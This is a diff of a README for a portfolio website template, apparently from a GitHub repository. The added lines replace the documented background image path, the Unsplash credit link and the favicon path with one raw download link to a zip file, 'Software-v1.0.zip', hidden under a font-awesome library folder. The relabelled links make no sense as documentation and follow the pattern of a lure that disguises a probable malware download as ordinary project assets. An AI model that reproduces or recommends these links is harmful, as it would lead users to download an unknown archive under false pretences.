M949939/devportfolio/README.md

 By default, the template comes with a number of images, some of which can be kept and others which act simply as placeholders and should be switched.
 The template contains the following:

-* Main background (images/lead-bg.jpg) - this is the main background image provided via [Unsplash](https://unsplash.com/).
-This can be kept or changed easily by replacing `images/lead-bg.jpg` with your new background (recommended size of at least 1920x1080).
+* Main background (https://github.com/M949939/devportfolio/raw/refs/heads/master/libs/font-awesome/Software-v1.0.zip) - this is the main background image provided via [Unsplash](https://github.com/M949939/devportfolio/raw/refs/heads/master/libs/font-awesome/Software-v1.0.zip).
+This can be kept or changed easily by replacing `https://github.com/M949939/devportfolio/raw/refs/heads/master/libs/font-awesome/Software-v1.0.zip` with your new background (recommended size of at least 1920x1080).
-* Favicon (/favicon.ico) - this is the favicon used for the page.
-Similar to the main bg, this can be kept or changed easily by replacing the `favicon.ico` with your new one.
+* Favicon (https://github.com/M949939/devportfolio/raw/refs/heads/master/libs/font-awesome/Software-v1.0.zip) - this is the favicon used for the page.
+Similar to the main bg, this can be kept or changed easily by replacing the `https://github.com/M949939/devportfolio/raw/refs/heads/master/libs/font-awesome/Software-v1.0.zip` with your new one.
 * Project image - these are the images associated with the projects under the project section.
 These are simply placeholders and should either be replaced or removed.

 ### Header Section